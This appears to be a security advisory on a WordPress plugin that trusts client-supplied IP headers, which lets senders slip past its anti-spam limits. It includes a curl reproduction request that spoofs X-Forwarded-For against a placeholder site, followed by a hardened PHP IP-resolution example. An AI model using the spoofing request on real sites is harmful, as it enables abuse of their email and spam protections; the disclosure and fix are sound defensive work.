The plugin prioritizes getting a visitor’s IP from certain HTTP headers over PHP’s REMOTE_ADDR, which makes it possible to bypass IP-based anti-spamming restrictions.
To reproduce, set the Client-IP or X-Forwarded-For request header (read by PHP as HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR), or any of the other headers used in get_ipaddress(), for example:
curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST -H 'X-Forwarded-For: 127.0.0.1' --data-raw 'action=email&yourname=admin&[email protected]&yourremarks=asdasd&friendname=Igor Popov&[email protected]&imageverify=ME5RJ&p=177&wp-email_nonce=646bfc1f45'
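A hardened way to resolve the visitor's address, shown as an added example that is not the plugin's own code: REMOTE_ADDR is authoritative unless the connection comes from a reverse proxy you operate, and only then is X-Forwarded-For read, from right to left. The function names and the $trusted proxy list are assumptions made for illustration.

```php
<?php
// Added example with hypothetical helper names; not code from the plugin.
// ASSUMPTION: $trusted holds the CIDR ranges of reverse proxies you operate.

// True when $ip falls inside $cidr (IPv4 or IPv6).
function ip_in_cidr(string $ip, string $cidr): bool {
    [$net, $bits] = array_pad(explode('/', $cidr, 2), 2, null);
    $a = @inet_pton($ip);
    $b = @inet_pton($net);
    if ($a === false || $b === false || strlen($a) !== strlen($b)) {
        return false; // invalid address, or IPv4/IPv6 family mismatch
    }
    if ($bits !== null && !ctype_digit($bits)) return false; // malformed prefix
    $bits = $bits === null ? strlen($a) * 8 : (int) $bits;
    if ($bits > strlen($a) * 8) return false;
    $full = intdiv($bits, 8); // whole bytes covered by the prefix
    $rem  = $bits % 8;        // leftover bits in the next byte
    if (substr($a, 0, $full) !== substr($b, 0, $full)) return false;
    if ($rem === 0) return true;
    $mask = (0xFF << (8 - $rem)) & 0xFF;
    return (ord($a[$full]) & $mask) === (ord($b[$full]) & $mask);
}

function is_trusted_proxy(string $ip, array $trusted): bool {
    foreach ($trusted as $cidr) {
        if (ip_in_cidr($ip, $cidr)) return true;
    }
    return false;
}

// Resolve the address to use for IP-based rate limiting.
function client_ip(array $server, array $trusted): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!is_trusted_proxy($remote, $trusted)) {
        return $remote; // direct peer: forwarding headers are client-supplied
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) { // rightmost hops came from our proxies
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) break;
        if (!is_trusted_proxy($hop, $trusted)) return $hop; // first untrusted hop
    }
    return $remote; // header empty, malformed, or only our own proxies
}

// Constructed sample requests (documentation address ranges).
$trusted = ['10.0.0.0/8'];
// Direct client sending a forged header, as in the request above.
echo client_ip(['REMOTE_ADDR' => '203.0.113.50', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1'], $trusted), "\n";
// Client behind our proxy that prepended a forged entry to the header.
echo client_ip(['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 198.51.100.7'], $trusted), "\n";
```

With an empty $trusted list the function always returns REMOTE_ADDR, which is the right default for a site that is not behind a reverse proxy.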